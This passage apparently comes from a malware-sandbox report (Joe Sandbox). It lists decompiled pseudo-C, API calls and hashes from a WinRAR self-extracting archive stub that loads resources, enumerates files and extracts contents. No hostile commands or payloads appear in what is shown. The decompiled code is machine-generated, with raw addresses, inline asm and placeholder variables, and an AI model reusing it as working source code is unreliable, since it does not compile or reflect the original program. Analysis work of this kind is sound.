                				}
                				if( *0x411098 == 0 &&  *0x418454 != 0) {
                					E003D6D83(0x411098, 0xff);
                				}
                				_t54 =  *0x42fcac;
                				 *0x418454 = 1;
                				if( *0x42fcac != 0) {
                					E003EDC3B(_t54);
                					CloseHandle( *0x42fcac);
                				}
                				_t94 =  *0x411098;
                				if( *0x427b7a != 0) {
                					_t57 =  *0x40e728; // 0x3e8
                					if( *0x427b7b == 0) {
                						__eflags = _t57;
                						if(_t57 < 0) {
                							_t94 = _t94 - _t57;
                							__eflags = _t94;
                						}
                					} else {
                						_t94 =  *0x42fca4;
                						if(_t57 > 0) {
                							_t94 = _t94 + _t57;
                						}
                					}
                				}
                				E003EAC7C(_t102 + 0x1c); // executed
                				return _t94;
                			}

                APIs
                  • Part of subcall function 003E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 003E087C
                  • Part of subcall function 003E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003E088E
                  • Part of subcall function 003E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003E08BF
                  • Part of subcall function 003EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 003EA655
                  • Part of subcall function 003EAC16: OleInitialize.OLE32(00000000), ref: 003EAC2F
                  • Part of subcall function 003EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003EAC66
                  • Part of subcall function 003EAC16: SHGetMalloc.SHELL32(00418438), ref: 003EAC70
                • GetCommandLineW.KERNEL32 ref: 003EDF5C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003EDF83
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 003EDF94
                • UnmapViewOfFile.KERNEL32(00000000), ref: 003EDFCE
                  • Part of subcall function 003EDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 003EDBF4
                  • Part of subcall function 003EDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003EDC30
                • CloseHandle.KERNEL32(00000000), ref: 003EDFD7
                • GetModuleFileNameW.KERNEL32(00000000,0042EC90,00000800), ref: 003EDFF2
                • SetEnvironmentVariableW.KERNELBASE(sfxname,0042EC90), ref: 003EDFFE
                • GetLocalTime.KERNEL32(?), ref: 003EE009
                • _swprintf.LIBCMT ref: 003EE048
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003EE05A
                • GetModuleHandleW.KERNEL32(00000000), ref: 003EE061
                • LoadIconW.USER32(00000000,00000064), ref: 003EE078
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 003EE0C9
                • Sleep.KERNEL32(?), ref: 003EE0F7
                • DeleteObject.GDI32 ref: 003EE130
                • DeleteObject.GDI32(?), ref: 003EE140
                • CloseHandle.KERNEL32 ref: 003EE183
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzB
                • API String ID: 3049964643-3604125803
                • Opcode ID: 7ee65e9843f7165d0c70369739af1002e8d9ce34db4206042ee66f52d2a14502
                • Instruction ID: e78d2d7b2ee02ad9081f3e895b17c24a0b23ca287a866a19bfae0391d842b1c5
                • Opcode Fuzzy Hash: 7ee65e9843f7165d0c70369739af1002e8d9ce34db4206042ee66f52d2a14502
                • Instruction Fuzzy Hash: 4F613C71A043A4AFD322AF72EC49F6B3BACEB48705F40053AF905A61D1DB789D44C769
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 886 3ea6c2-3ea6df FindResourceW 887 3ea7db 886->887 888 3ea6e5-3ea6f6 SizeofResource 886->888 890 3ea7dd-3ea7e1 887->890 888->887 889 3ea6fc-3ea70b LoadResource 888->889 889->887 891 3ea711-3ea71c LockResource 889->891 891->887 892 3ea722-3ea737 GlobalAlloc 891->892 893 3ea73d-3ea746 GlobalLock 892->893 894 3ea7d3-3ea7d9 892->894 895 3ea7cc-3ea7cd GlobalFree 893->895 896 3ea74c-3ea76a call 3f0320 893->896 894->890 895->894 900 3ea76c-3ea78e call 3ea626 896->900 901 3ea7c5-3ea7c6 GlobalUnlock 896->901 900->901 906 3ea790-3ea798 900->906 901->895 907 3ea79a-3ea7ae GdipCreateHBITMAPFromBitmap 906->907 908 3ea7b3-3ea7c1 906->908 907->908 909 3ea7b0 907->909 908->901 909->908
                C-Code - Quality: 53%
                			E003EA6C2(WCHAR* _a4) {
                				char _v4;
                				char _v8;
                				char _v20;
                				intOrPtr* _v28;
                				void* __ecx;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				intOrPtr* _t27;
                				char* _t34;
                				void* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				long _t44;
                				intOrPtr* _t45;
                				struct HRSRC__* _t46;
                
                				_t46 = FindResourceW( *0x411028, _a4, "PNG");
                				if(_t46 == 0) {
                					L15:
                					return 0;
                				}
                				_t44 = SizeofResource( *0x411028, _t46);
                				if(_t44 == 0) {
                					goto L15;
                				}
                				_t17 = LoadResource( *0x411028, _t46);
                				if(_t17 == 0) {
                					goto L15;
                				}
                				_t18 = LockResource(_t17);
                				_t47 = _t18;
                				if(_t18 == 0) {
                					goto L15;
                				}
                				_v4 = 0;
                				_t19 = GlobalAlloc(2, _t44); // executed
                				_t36 = _t19;
                				if(_t36 == 0) {
                					L14:
                					return _v4;
                				}
                				if(GlobalLock(_t36) == 0) {
                					L13:
                					GlobalFree(_t36);
                					goto L14;
                				}
                				E003F0320(_t21, _t47, _t44);
                				_v8 = 0;
                				_push( &_v8);
                				_push(0);
                				_push(_t36);
                				if( *0x433180() == 0) {
                					_t27 = E003EA626(_t25, _t38, _v20, 0); // executed
                					_t39 = _v28;
                					_t45 = _t27;
                					 *0x403278(_t39);
                					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
                					if(_t45 != 0) {
                						 *((intOrPtr*)(_t45 + 8)) = 0;
                						if( *((intOrPtr*)(_t45 + 8)) == 0) {
                							_push(0xffffff);
                							_t34 =  &_v20;
                							_push(_t34);
                							_push( *((intOrPtr*)(_t45 + 4)));
                							L003EEB26(); // executed
                							if(_t34 != 0) {
                								 *((intOrPtr*)(_t45 + 8)) = _t34;
                							}
                						}
                						 *0x403278(1);
                						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
                					}
                				}
                				GlobalUnlock(_t36);
                				goto L13;
                			}




















                APIs
                • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,003EB73D,00000066), ref: 003EA6D5
                • SizeofResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA6EC
                • LoadResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA703
                • LockResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA712
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,003EB73D,00000066), ref: 003EA72D
                • GlobalLock.KERNEL32 ref: 003EA73E
                • GlobalUnlock.KERNEL32(00000000), ref: 003EA7C6
                  • Part of subcall function 003EA626: GdipAlloc.GDIPLUS(00000010), ref: 003EA62C
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003EA7A7
                • GlobalFree.KERNEL32 ref: 003EA7CD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 541704414-364855578
                • Opcode ID: b7158d1648d3b8fde462868a9086dc81682faf8f7f6b61c90d56911dff4f0c44
                • Instruction ID: 177f09e7a02ac27e1fffb01f70383d7e320eca4b750809ccfe60f2f174e3aaa1
                • Opcode Fuzzy Hash: b7158d1648d3b8fde462868a9086dc81682faf8f7f6b61c90d56911dff4f0c44
                • Instruction Fuzzy Hash: AC310271600752AFC712DF62EC88D2B7FBCEF89751B010628F901966A0EB31ED00CAA5
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1035 3da69b-3da6bf call 3eec50 1038 3da727-3da730 FindNextFileW 1035->1038 1039 3da6c1-3da6ce FindFirstFileW 1035->1039 1041 3da742-3da7ff call 3e0602 call 3dc310 call 3e15da * 3 1038->1041 1042 3da732-3da740 GetLastError 1038->1042 1040 3da6d0-3da6e2 call 3dbb03 1039->1040 1039->1041 1050 3da6fe-3da707 GetLastError 1040->1050 1051 3da6e4-3da6fc FindFirstFileW 1040->1051 1048 3da804-3da811 1041->1048 1045 3da719-3da722 1042->1045 1045->1048 1053 3da709-3da70c 1050->1053 1054 3da717 1050->1054 1051->1041 1051->1050 1053->1054 1056 3da70e-3da711 1053->1056 1054->1045 1056->1054 1058 3da713-3da715 1056->1058 1058->1045
                C-Code - Quality: 81%
                			E003DA69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
                				intOrPtr _v572;
                				intOrPtr _v580;
                				intOrPtr _v588;
                				struct _WIN32_FIND_DATAW _v596;
                				short _v4692;
                				int _t44;
                				int _t49;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				long _t66;
                				void* _t69;
                				signed int _t78;
                				void* _t79;
                				intOrPtr _t80;
                				void* _t81;
                
                				E003EEC50(0x1250);
                				_t81 = _a4;
                				_t79 = _t78 | 0xffffffff;
                				_push( &_v596);
                				if(_t81 != _t79) {
                					_t44 = FindNextFileW(_t81, ??);
                					__eflags = _t44;
                					if(_t44 != 0) {
                						L12:
                						_t80 = _a12;
                						E003E0602(_t80, _a8, 0x800);
                						_push(0x800);
                						E003DC310(__eflags, _t80,  &(_v596.cFileName));
                						_t49 = 0 + _v596.nFileSizeLow;
                						__eflags = _t49;
                						 *(_t80 + 0x1000) = _t49;
                						asm("adc ecx, 0x0");
                						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
                						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
                						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
                						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
                						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
                						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
                						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
                						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
                						E003E15DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
                						E003E15DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
                						E003E15DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
                						L13:
                						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
                						return _t81;
                					}
                					_t81 = _t79;
                					_t61 = GetLastError();
                					__eflags = _t61 - 0x12;
                					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
                					L9:
                					_t80 = _a12;
                					 *(_t80 + 0x1044) = _t62;
                					goto L13;
                				}
                				_t63 = FindFirstFileW(_a8, ??); // executed
                				_t81 = _t63;
                				if(_t81 != _t79) {
                					goto L12;
                				}
                				if(E003DBB03(_a8,  &_v4692, 0x800) == 0) {
                					L4:
                					_t66 = GetLastError();
                					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
                						_t62 = 0;
                						__eflags = 0;
                					} else {
                						_t62 = 1;
                					}
                					goto L9;
                				}
                				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
                				_t81 = _t69;
                				if(_t81 != _t79) {
                					goto L12;
                				}
                				goto L4;
                			}




















                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6C4
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6F2
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6FE
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA728
                • GetLastError.KERNEL32(?,?,?,?,003DA592,000000FF,?,?), ref: 003DA734
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next_wcslen
                • String ID:
                • API String ID: 42610566-0
                • Opcode ID: b7fdea34c58f5ecfc547aff0658879bbc40d275035b8ccf589967f4103888cf8
                • Instruction ID: fdd4c7c00bd0cac99afbde9f4b8e2347514333707261f5310af7afdb5e723d65
                • Opcode Fuzzy Hash: b7fdea34c58f5ecfc547aff0658879bbc40d275035b8ccf589967f4103888cf8
                • Instruction Fuzzy Hash: C141C232900515ABCB26DFA4DD84AEAB7B8FB48350F1042A6F55DE3340D734AE94CF90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003F7DEE(int _a4) {
                				void* _t14;
                				void* _t15;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                
                				if(E003FB076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                					TerminateProcess(GetCurrentProcess(), _a4);
                				}
                				E003F7E73(_t15, _a4);
                				ExitProcess(_a4);
                			}









                APIs
                • GetCurrentProcess.KERNEL32(?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7E0F
                • TerminateProcess.KERNEL32(00000000,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7E16
                • ExitProcess.KERNEL32 ref: 003F7E28
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: a49c75186d45c462394fec0c484df0ff5e3e598a66ea5edaabb19c1625c5c1a9
                • Instruction ID: 17cb7c58991f2397b7a8afbc45c940231519307f1d78877d9d6e69fa272e3149
                • Opcode Fuzzy Hash: a49c75186d45c462394fec0c484df0ff5e3e598a66ea5edaabb19c1625c5c1a9
                • Instruction Fuzzy Hash: 79E04631000148ABCF026F20CE09AAABF6AEB20342F104465FA199A132CB36DE52CA84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E003D848E(intOrPtr __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t383;
                				signed int _t387;
                				signed int _t392;
                				signed int _t398;
                				void* _t400;
                				signed int _t401;
                				signed int _t405;
                				signed int _t406;
                				intOrPtr _t407;
                				signed int _t411;
                				signed int _t416;
                				signed int _t417;
                				signed int _t421;
                				signed int _t431;
                				signed int _t432;
                				signed int _t435;
                				signed int _t436;
                				signed int _t442;
                				signed int _t445;
                				signed int _t446;
                				char _t448;
                				signed int _t449;
                				signed int _t450;
                				signed int _t473;
                				signed int _t482;
                				intOrPtr _t485;
                				signed int _t495;
                				char _t500;
                				char _t501;
                				void* _t508;
                				void* _t515;
                				void* _t517;
                				signed int _t525;
                				signed int _t529;
                				signed int _t530;
                				signed int _t531;
                				signed int _t534;
                				signed int _t536;
                				signed int _t543;
                				signed int _t552;
                				signed int _t554;
                				signed int _t556;
                				signed int _t558;
                				signed char _t559;
                				signed int _t562;
                				void* _t567;
                				signed int _t573;
                				intOrPtr* _t582;
                				signed int _t585;
                				signed int _t586;
                				signed int _t595;
                				signed int _t596;
                				intOrPtr _t599;
                				signed int _t602;
                				signed int _t611;
                				signed int _t613;
                				signed int _t616;
                				signed int _t619;
                				signed int _t621;
                				signed int _t622;
                				signed int _t624;
                				signed int _t625;
                				signed int _t628;
                				void* _t637;
                				intOrPtr _t645;
                				char _t646;
                				signed int _t649;
                				signed int _t650;
                				void* _t657;
                				void* _t658;
                				signed int _t675;
                				intOrPtr _t686;
                				void* _t688;
                				signed int _t689;
                				signed int _t690;
                				signed int _t691;
                				signed int _t692;
                				signed int _t695;
                				intOrPtr _t697;
                				signed int _t702;
                				signed int _t704;
                				signed int _t707;
                				void* _t712;
                				signed int _t713;
                				signed int _t716;
                				signed int _t717;
                				void* _t719;
                				void* _t721;
                				void* _t723;
                				void* _t725;
                
                				E003EEB78(0x402858, _t721);
                				E003EEC50(0x60ac);
                				_t582 =  *((intOrPtr*)(_t721 + 8));
                				_t684 = 0;
                				_t697 = __ecx;
                				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
                				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
                				 *(_t721 - 0x18) = _t585;
                				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
                					_t704 = __ecx + 0x10;
                					 *(_t721 - 0x20) = _t704;
                					L5:
                					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
                					if(_t383 == 2) {
                						 *(_t697 + 0x10ff) = _t684;
                						__eflags =  *(_t582 + 0x32f4) - _t684;
                						if(__eflags > 0) {
                							L22:
                							__eflags =  *(_t582 + 0x32fc) - _t684;
                							if(__eflags > 0) {
                								L26:
                								_t586 =  *(_t697 + 8);
                								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
                								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
                									L29:
                									 *(_t721 - 0x13) = _t684;
                									_t37 = _t721 - 0x60b8; // -22712
                									_t38 = _t721 - 0x13; // 0x7ed
                									_t387 = E003D5D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
                									__eflags = _t387;
                									 *(_t721 - 0x11) = _t387 != 0;
                									__eflags = _t387;
                									if(_t387 != 0) {
                										__eflags =  *(_t721 - 0x13);
                										if( *(_t721 - 0x13) == 0) {
                											__eflags = 0;
                											 *((char*)(_t697 + 0xf9)) = 0;
                										}
                									}
                									E003D2112(_t582);
                									_t43 = _t721 - 0x30b8; // -10424
                									E003DB76C(_t582, _t582 + 0x22c0, _t43, 0x800);
                									__eflags =  *((char*)(_t582 + 0x338b));
                									 *(_t721 - 0x24) = 1;
                									if( *((char*)(_t582 + 0x338b)) == 0) {
                										_t392 = E003D2209(_t582);
                										__eflags = _t392;
                										if(_t392 == 0) {
                											_t559 =  *(_t697 + 8);
                											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
                											asm("sbb al, al");
                											_t61 = _t721 - 0x11;
                											 *_t61 =  *(_t721 - 0x11) &  !_t559;
                											__eflags =  *_t61;
                										}
                									} else {
                										_t562 =  *( *(_t697 + 8) + 0x82c4);
                										__eflags = _t562 - 1;
                										if(_t562 != 1) {
                											__eflags =  *(_t721 - 0x13);
                											if( *(_t721 - 0x13) == 0) {
                												__eflags = _t562;
                												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
                												_push(0);
                												_t54 = _t721 - 0x30b8; // -10424
                												_t567 = E003DC249(_t54);
                												_t675 =  *(_t697 + 8);
                												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
                												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
                													 *(_t721 - 0x11) = 0;
                												} else {
                													_t57 = _t721 - 0x30b8; // -10424
                													_push(1);
                													E003DC249(_t57);
                												}
                											}
                										}
                									}
                									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
                									 *((char*)(_t697 + 0x68)) = 0;
                									asm("sbb eax, [ebx+0x32f4]");
                									 *0x403278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
                									 *((intOrPtr*)( *_t582 + 0x10))();
                									_t685 = 0;
                									_t398 = 0;
                									_t595 = 0;
                									 *(_t721 - 0xd) = 0;
                									 *(_t721 - 0x28) = 0;
                									__eflags =  *(_t582 + 0x3333);
                									if( *(_t582 + 0x3333) == 0) {
                										L44:
                										__eflags =  *(_t721 - 0x11) - _t595;
                										if( *(_t721 - 0x11) != _t595) {
                											L47:
                											_t707 =  *(_t721 - 0x18);
                											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
                											_t400 = 0x49;
                											__eflags = _t596;
                											if(_t596 == 0) {
                												L49:
                												_t401 = _t685;
                												L50:
                												__eflags = _t596;
                												_t88 = _t721 - 0x30b8; // -10424
                												_t405 = L003E1B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
                												__eflags = _t405;
                												if(__eflags == 0) {
                													L14:
                													_t406 = 0;
                													__eflags = 0;
                													L15:
                													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
                													return _t406;
                												}
                												_push(0x800);
                												_t407 = _t697 + 0x1100;
                												_push(_t407);
                												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
                												_t91 = _t721 - 0x30b8; // -10424
                												_push(_t582);
                												E003D8167(__eflags);
                												__eflags =  *(_t721 - 0xd);
                												if( *(_t721 - 0xd) != 0) {
                													L54:
                													 *(_t721 - 0xe) = 0;
                													L55:
                													_t411 =  *(_t697 + 8);
                													_t599 = 0x45;
                													__eflags =  *((char*)(_t411 + 0x715b));
                													_t686 = 0x58;
                													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
                													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
                													if( *((char*)(_t411 + 0x715b)) != 0) {
                														L57:
                														__eflags = _t707 - _t599;
                														if(_t707 == _t599) {
                															L59:
                															_t102 = _t721 - 0x20b8; // -6328
                															E003D6EDB(_t102);
                															_push(0);
                															_t103 = _t721 - 0x20b8; // -6328
                															_t416 = E003DA56D(_t102, __eflags, _t697 + 0x1100, _t103);
                															__eflags = _t416;
                															if(_t416 == 0) {
                																_t417 =  *(_t697 + 8);
                																__eflags =  *((char*)(_t417 + 0x715b));
                																_t114 = _t721 - 0xe;
                																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
                																__eflags =  *_t114;
                																L65:
                																_t116 = _t721 - 0x30b8; // -10424
                																_t421 = E003D7C0D(_t582, _t116);
                																__eflags = _t421;
                																if(_t421 != 0) {
                																	while(1) {
                																		__eflags =  *(_t582 + 0x3333);
                																		if( *(_t582 + 0x3333) == 0) {
                																			goto L69;
                																		}
                																		_t121 = _t721 - 0x30b8; // -10424
                																		_t552 = E003D8117(_t697, _t582, _t121);
                																		__eflags = _t552;
                																		if(_t552 == 0) {
                																			 *((char*)(_t697 + 0x2100)) = 1;
                																			goto L14;
                																		}
                																		L69:
                																		_t123 = _t721 - 0x1174; // -2420
                																		_t602 = 0x40;
                																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
                																		_t725 = _t723 + 0xc;
                																		asm("movsw");
                																		_t125 = _t721 - 0x2c; // 0x7d4
                																		 *(_t721 - 4) = 0;
                																		asm("sbb ecx, ecx");
                																		_t132 = _t721 - 0x1174; // -2420
                																		E003DD051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
                																		__eflags =  *(_t582 + 0x3333);
                																		if( *(_t582 + 0x3333) == 0) {
                																			L77:
                																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                																			L78:
                																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                																			_t153 = _t721 - 0x1174; // -2420
                																			L003DF204(_t153);
                																			_t154 = _t721 - 0x1070; // -2160
                																			E003D9556(_t154);
                																			_t611 =  *(_t582 + 0x3398);
                																			_t431 = 1;
                																			 *(_t721 - 0x20) = _t611;
                																			 *(_t721 - 4) = 1;
                																			_t688 = 0x50;
                																			__eflags = _t611;
                																			if(_t611 == 0) {
                																				L88:
                																				_t432 = E003D2209(_t582);
                																				__eflags = _t432;
                																				if(_t432 == 0) {
                																					_t613 =  *(_t721 - 0xe);
                																					__eflags = _t613;
                																					if(_t613 == 0) {
                																						L98:
                																						_t431 = 1;
                																						__eflags = 1;
                																						L99:
                																						__eflags =  *(_t582 + 0x6ccc);
                																						if(__eflags == 0) {
                																							__eflags = _t613;
                																							if(_t613 == 0) {
                																								L218:
                																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                																								_t368 = _t721 - 0x1070; // -2160
                																								_t398 = E003D959A(_t368);
                																								__eflags =  *(_t721 - 0x11);
                																								_t595 =  *(_t721 - 0xe);
                																								_t689 =  *(_t721 - 0xd);
                																								if( *(_t721 - 0x11) != 0) {
                																									_t372 = _t697 + 0xf4;
                																									 *_t372 =  *(_t697 + 0xf4) + 1;
                																									__eflags =  *_t372;
                																								}
                																								L220:
                																								__eflags =  *((char*)(_t697 + 0x68));
                																								if( *((char*)(_t697 + 0x68)) != 0) {
                																									goto L14;
                																								}
                																								__eflags = _t595;
                																								if(_t595 != 0) {
                																									L17:
                																									_t406 = 1;
                																									goto L15;
                																								}
                																								__eflags =  *(_t582 + 0x6ccc) - _t595;
                																								if( *(_t582 + 0x6ccc) == _t595) {
                																									L9:
                																									E003D1F47(_t582);
                																									goto L17;
                																								}
                																								__eflags = _t689;
                																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
                																								goto L15;
                																							}
                																							L104:
                																							_t616 =  *(_t721 - 0x18);
                																							L105:
                																							_t435 =  *(_t697 + 8);
                																							__eflags =  *((char*)(_t435 + 0x7201));
                																							if( *((char*)(_t435 + 0x7201)) == 0) {
                																								L107:
                																								_t436 =  *(_t721 - 0xd);
                																								__eflags = _t436;
                																								if(_t436 != 0) {
                																									L112:
                																									 *((char*)(_t721 - 0x12)) = 1;
                																									__eflags = _t436;
                																									if(_t436 != 0) {
                																										L114:
                																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
                																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
                																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
                																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
                																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
